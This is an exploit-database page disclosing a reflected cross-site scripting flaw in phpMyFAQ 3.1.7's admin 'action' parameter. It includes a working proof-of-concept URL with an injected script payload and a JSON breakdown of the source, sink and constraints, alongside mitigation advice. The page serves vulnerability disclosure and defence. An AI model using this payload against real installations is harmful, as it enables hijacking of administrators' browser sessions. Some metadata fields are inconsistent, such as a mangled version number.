header-logo
Suggest Exploit
vendor:
phpMyFAQ
by:
CodeSecLab
6.1
CVSS
HIGH
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: phpMyFAQ
Affected Version From: 3.1.2007
Affected Version To: 3.1.2007
Patch Exists: NO
Related CWE: CVE-2022-4407
CPE: a:phpmyfaq:phpmyfaq:3.1.7
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=118573https://www.infosecmatter.com/nessus-plugin-library/?id=77822
Platforms Tested: Ubuntu, Windows
2024

phpMyFAQ 3.1.7 – Reflected Cross-Site Scripting (XSS)

A reflected cross-site scripting (XSS) vulnerability was found in phpMyFAQ version 3.1.7. By injecting malicious script code into the 'action' parameter of the URL, an attacker can execute arbitrary scripts in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, input coming from the user should be validated, sanitized, and properly encoded before being used in HTML attributes. It is recommended to apply patches provided by the vendor as soon as they are available.
Source

Exploit-DB raw data:

# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407

PoC: 
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>

Details: 
{
    "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
    "Vulnerable Variable": "action",
    "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
    "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
    "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
    "Attack Payload": "\"><script>alert('XSS')</script>",
    "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
    "Request Parameters": "action",
    "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
    "Request Method": "GET",
    "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}

[Replace Your Domain Name]

Navigation

Suggest Exploit

Services By CQR